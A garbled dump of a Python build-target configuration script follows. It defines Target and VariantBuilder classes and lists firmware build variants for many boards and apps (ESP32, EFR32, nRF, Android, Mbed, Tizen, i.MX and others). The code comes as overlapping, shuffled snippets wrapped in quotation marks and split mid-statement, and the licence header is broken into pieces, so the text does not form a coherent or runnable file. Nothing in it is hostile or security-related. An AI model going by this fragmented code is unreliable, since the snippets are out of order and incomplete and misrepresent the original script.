builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets:", "app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release',", "v for v in self.variants if v.validator.Accept(target.name)] # Build every", "yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release',", "builds is exponential here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\",", "skip variants that do not work for this target ok_variants", "app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of XIP", "app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01,", "'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets", "'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist(", "target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets(): target = Target('imx', IMXBuilder) yield", "app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER,", "conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True),", "Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01,", "from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg import QpgApp,", "@property def IsGlobBlacklisted(self): return self.glob_blacklist_reason is not None @property def", "from builders.esp32 import Esp32App, Esp32Board, Esp32Builder from builders.host import HostApp,", "app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack,", "def __init__(self, name: str, validator=AcceptAnyName(), conflicts: List[str] = [], requires:", "app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce", "builder.AppendVariant(name=\"asan\", use_asan=True) target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for", "app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings',", "TelinkBoard, TelinkBuilder from builders.tizen import TizenApp, TizenBoard, TizenBuilder from builders.bl602", "class AcceptNameWithSubstrings: def __init__(self, substr: List[str]): self.substr = substr def", "= [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] # Enable nrf52840dongle", "Interactive builds will not compile by default on arm cross", "None @property def GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName: def Accept(self,", "v in self.variants if v.validator.Accept(target.name)] # Build every possible variant", "target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "added one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder,", "self builder.identifier = self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return", "for option in subgroup: variant_target = variant_target.Extend( option.name, **option.buildargs) #", "target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86,", "board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested') ]", "substr def Accept(self, name: str): for s in self.substr: if", "for target in self.targets: yield target # skip variants that", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "= Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist(", "False def AllRequirementsMet(items: List[BuildVariant]) -> bool: \"\"\" Check that item.requires", "targets. \"\"\" for target in self.targets: yield target # skip", "variant_target = variant_target.GlobBlacklist( 'Reduce default build variants') yield variant_target def", "board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4166a',", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend(", "board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder,", "specified build) \"\"\" def __init__(self, name, builder_class, **kwargs): self.name =", "based on a starting target. \"\"\" def __init__(self, targets: List[Target]", "yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield", "app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for", "esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target = Target('efr32', Efr32Builder) board_targets", "board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell',", "\"\"\" def __init__(self, targets: List[Target] = []): # note the", "a starting target. \"\"\" def __init__(self, targets: List[Target] = []):", "yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light',", "use_asan=True) target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target", "builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True),", "'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist(", "number of potential builds is exponential here. builder = VariantBuilder()", "'-nrf5340dk-' in rpc.name: rpc = rpc.GlobBlacklist( 'Compile failure due to", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "build variant \"\"\" clone = self.Clone() clone.name += \"-\" +", "= requires def HasConflicts(items: List[BuildVariant]) -> bool: for a, b", "use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default", "board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL)", "(HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64',", "for target in builder.AllVariants(): yield target def Bl602Targets(): target =", "Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32 import Efr32App, Efr32Board, Efr32Builder from", "'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder() # Possible", "builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants. Note that number of", "Bl602Targets(), IMXTargets(), ] for generator in target_generators: for target in", "or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name): # Single-variant", "specific language governing permissions and # limitations under the License.", "in self.variants if v.validator.Accept(target.name)] # Build every possible variant for", "b in combinations(items, 2): if (a.name in b.conflicts) or (b.name", "default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build", "suffix clone.create_kw_args.update(kargs) return clone def Create(self, runner, repository_path: str, output_prefix:", "+= reason else: clone.glob_blacklist_reason = reason return clone @property def", "for a, b in combinations(items, 2): if (a.name in b.conflicts)", "another variant to accepted variants. Arguments are construction variants to", "cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if", "test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board in [HostBoard.NATIVE, HostBoard.FAKE]: yield", "validator=AcceptAnyName(), conflicts: List[str] = [], requires: List[str] = [], **buildargs):", "self.\"\"\" clone = Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return", "in combinations(items, 2): if (a.name in b.conflicts) or (b.name in", "separator to the clone name **kargs: arguments needed to produce", "# you may not use this file except in compliance", "Yields a list of acceptable variants for the given targets.", "self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name: str): return True class", "yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets():", "(HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = []", "\"\"\" for target in self.targets: yield target # skip variants", "'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested') ] builder", "NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg import QpgApp, QpgBoard, QpgBuilder from", "[ v for v in self.variants if v.validator.Accept(target.name)] # Build", "app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER)", "target: Has a name identifier plus parameters on how to", "class AcceptAnyName: def Accept(self, name: str): return True class AcceptNameWithSubstrings:", "runner=runner, **self.create_kw_args) builder.target = self builder.identifier = self.name builder.output_dir =", "clone def Create(self, runner, repository_path: str, output_prefix: str, enable_flashbundle: bool):", "yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell',", "devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement',", "app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,", "[] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified variant to", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "Handles conflict resolution between build variants and globbing whitelist targets.", "' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets(): target = Target('infineon', InfineonBuilder) yield target.Extend('p6-lock',", "b.conflicts) or (b.name in a.conflicts): return True return False def", "Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False)", "app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT))", "target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT,", "under the Apache License, Version 2.0 (the \"License\"); # you", "here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True)", "Only a few are whitelisted for globs name = '-'.join([o.name", "board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target =", "disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', app=K32WApp.LOCK, release=True)", "app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def", "app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield", "# Target ready to be created - no conflicts variant_target", "builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[", "cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32", "builds yield target else: builder.targets.append(target) for target in builder.AllVariants(): if", "ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target = Target('k32w', K32WBuilder) yield", "app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE)", "accepted variants. Arguments are construction variants to BuildVariant. Example usage:", "builder = VariantBuilder() # Possible build variants. Note that number", "yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets: yield target.Extend('all-clusters',", "esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS)", "app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS)", "devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield", "yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app',", "efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'),", "board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a',", "enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,", "devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS,", "\"\"\"Creates a clone of self.\"\"\" clone = Target(self.name, self.builder_class, **self.create_kw_args.copy())", "app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder() # Possible build variants. Note", "target.name) or ('nl-test-runner' in target.name): # Single-variant builds yield target", "from builders.imx import IMXApp, IMXBuilder class Target: \"\"\"Represents a build", "len(ok_variants) + 1): for subgroup in combinations(ok_variants, variant_count): if HasConflicts(subgroup):", "= [] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified variant", "we do not want a 'build all' to select all", "app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield", "if v.validator.Accept(target.name)] # Build every possible variant for variant_count in", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "identifier plus parameters on how to build it (what builder", "multiple build variants based on a starting target. \"\"\" def", "in target.name and '-no-interactive' not in target.name: # Interactive builds", "app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests',", "app=NrfApp.LIGHT) for target in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock',", "yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets():", "yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield", "NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(),", "else: builder.targets.append(target) for target in builder.AllVariants(): if cross_compile and 'chip-tool'", "a 'build all' to select all variants, so variants are", "a build target: Has a name identifier plus parameters on", "yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True)", "variants, so variants are generally glob-blacklisted. \"\"\" self.glob_whitelist.append(name) def AppendVariant(self,", "board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL)", "QpgApp, QpgBoard, QpgBuilder from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder from", "builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target", "in item.requires: if requirement not in available: return False return", "def HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE)", "AppendVariant(self, **args): \"\"\" Add another variant to accepted variants. Arguments", "not compile by default on arm cross compiles # because", "builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only')", "self.targets = targets[:] self.variants = [] self.glob_whitelist = [] def", "[] for target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend(", "reason else: clone.glob_blacklist_reason = reason return clone @property def IsGlobBlacklisted(self):", "yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist(", "interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True),", "'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build", "[ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets = [] for target in", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name: str): return", "efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'),", "progress_logging=False) def QorvoTargets(): target = Target('qpg', QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105,", "target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app',", "self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason += \", \" clone.glob_blacklist_reason += reason", "part of the default sysroot yield target.GlobBlacklist('Arm crosscompile does not", "that number of potential # builds is exponential here builder.AppendVariant(name=\"same-event-loop\",", "def Accept(self, name: str): for s in self.substr: if s", "Apache License, Version 2.0 (the \"License\"); # you may not", "build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang',", "either express or implied. # See the License for the", "enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants(): yield target def NrfTargets():", "target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')", "target = Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters',", "\"\"\"Creates a clone of the current object extending its build", "board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE)", "yield devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield", "Efr32App, Efr32Board, Efr32Builder from builders.esp32 import Esp32App, Esp32Board, Esp32Builder from", "List[BuildVariant]) -> bool: \"\"\" Check that item.requires is satisfied for", "import TizenApp, TizenBoard, TizenBuilder from builders.bl602 import Bl602App, Bl602Board, Bl602Builder", "in target.name: # Interactive builds will not compile by default", "Esp32Board, Esp32Builder from builders.host import HostApp, HostBoard, HostBuilder from builders.infineon", "HasConflicts(subgroup): continue if not AllRequirementsMet(subgroup): continue # Target ready to", "K32WBuilder from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile from builders.nrf", "from builders.k32w import K32WApp, K32WBuilder from builders.mbed import MbedApp, MbedBoard,", "builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants(): yield target def", "def InfineonTargets(): target = Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK)", "= targets[:] self.variants = [] self.glob_whitelist = [] def WhitelistVariantNameForGlob(self,", "board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets(): target = Target('imx', IMXBuilder) yield target.Extend('chip-tool',", "= [] target_generators = [ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(),", "arm cross compiles # because libreadline is not part of", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "self.builder_class = builder_class self.glob_blacklist_reason = None self.create_kw_args = kwargs def", "one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D,", "self.conflicts = conflicts self.buildargs = buildargs self.requires = requires def", "target # Without extra build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield", "target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc =", "app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target = Target('mbed', MbedBuilder) targets = [", "TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in builder.AllVariants(): yield target", "for target in generator: ALL.append(target) # Simple targets added one", "target in generator: ALL.append(target) # Simple targets added one by", "target def NrfTargets(): target = Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64,", "release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL = [] target_generators =", "else: clone.glob_blacklist_reason = reason return clone @property def IsGlobBlacklisted(self): return", "board=HostBoard.ARM64)) app_targets = [] # Don't cross compile some builds", "app=HostApp.TESTS) def Esp32Targets(): esp32_target = Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack,", "name: str): for s in self.substr: if s in name:", "creating multiple build variants based on a starting target. \"\"\"", "'-'.join([o.name for o in subgroup]) if name not in self.glob_whitelist:", "devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge',", "variants. Note that number of potential # builds is exponential", "Whitelist the specified variant to be allowed for globbing. By", "app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', 